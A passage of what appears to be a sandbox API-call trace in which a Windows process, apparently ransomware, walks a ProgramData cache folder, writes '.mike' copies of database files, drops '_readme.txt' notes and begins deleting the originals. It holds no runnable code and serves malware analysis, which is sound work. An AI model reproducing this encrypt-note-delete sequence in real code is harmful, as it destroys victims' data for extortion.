lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.779] CoTaskMemFree (pv=0x4e1c10) [0138.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.780] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows", lpFilePart=0x0) returned 0x20 [0138.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd5be7172, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AIT", cAlternateFileName="")) returned 1 [0138.780] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x283ea490, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x9b86da60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x9b86da60, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Caches", cAlternateFileName="")) returned 1 [0138.781] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceMetadataStore", cAlternateFileName="DEVICE~1")) returned 1 [0138.781] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.781] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.781] CoTaskMemFree (pv=0x4e1c10) [0138.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.782] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\AIT", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\AIT", lpFilePart=0x0) returned 0x24 [0138.782] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.782] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.783] CoTaskMemFree (pv=0x4e1c10) [0138.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.783] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches", lpFilePart=0x0) returned 0x27 [0138.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.784] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", lpFilePart=0x0) returned 0x3b [0138.784] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", lpFilePart=0x0) returned 0x36 [0138.789] WriteFile (in: hFile=0x280, lpBuffer=0x21812f8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21812f8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.790] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", lpFilePart=0x0) returned 0x3b [0138.790] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", lpFilePart=0x0) returned 0x3b [0138.790] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", dwFileAttributes=0x80) returned 1 [0138.792] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", lpFilePart=0x0) returned 0x3b [0138.792] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.mike", lpFilePart=0x0) returned 0x3b [0138.794] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.794] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.795] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db", lpFilePart=0x0) returned 0x69 [0138.800] WriteFile (in: hFile=0x280, lpBuffer=0x218fb98*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x218fb98*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.800] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.801] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db", dwFileAttributes=0x80) returned 1 [0138.802] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", lpFilePart=0x0) returned 0x33 [0138.803] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.804] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", lpFilePart=0x0) returned 0x6e [0138.804] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db", lpFilePart=0x0) returned 0x69 [0138.808] WriteFile (in: hFile=0x280, lpBuffer=0x21a030c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21a030c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.808] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", lpFilePart=0x0) returned 0x6e [0138.809] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db", dwFileAttributes=0x80) returned 1 [0138.810] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", lpFilePart=0x0) returned 0x6e [0138.811] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.mike", lpFilePart=0x0) returned 0x6e [0138.812] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.812] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.813] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db", lpFilePart=0x0) returned 0x69 [0138.816] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.816] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.816] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db", dwFileAttributes=0x80) returned 1 [0138.818] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.818] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.819] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.820] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.820] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db", lpFilePart=0x0) returned 0x69 [0138.824] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.824] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.824] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db", dwFileAttributes=0x80) returned 1 [0138.826] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.827] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.mike", lpFilePart=0x0) returned 0x6e [0138.828] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.829] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.829] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db", lpFilePart=0x0) returned 0x69 [0138.833] WriteFile (in: hFile=0x280, lpBuffer=0x21d1008*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21d1008*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.834] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.834] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db.mike", lpFilePart=0x0) returned 0x6e [0138.834] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db", dwFileAttributes=0x80) returned 1 [0138.835] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", lpFilePart=0x0) returned 0x33 [0138.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.838] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", lpFilePart=0x0) returned 0x6e [0138.838] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db", lpFilePart=0x0) returned 0x69 [0138.861] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", lpFilePart=0x0) returned 0x6e [0138.861] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db.mike", lpFilePart=0x0) returned 0x6e [0138.861] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db", dwFileAttributes=0x80) returned 1 [0138.864] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\_readme.txt", lpFilePart=0x0) returned 0x33 [0138.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0138.866] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", lpFilePart=0x0) returned 0x6e [0138.866] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", lpFilePart=0x0) returned 0x69 [0138.883] WriteFile (in: hFile=0x280, lpBuffer=0x21de04c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21de04c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0138.883] CloseHandle (hObject=0x280) returned 1 [0138.883] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", lpFilePart=0x0) returned 0x6e [0138.884] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.mike", lpFilePart=0x0) returned 0x6e [0138.884] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", dwFileAttributes=0x80) returned 1 [0138.884] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db", lpFilePart=0x0) returned 0x69 [0138.884] DeleteFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: 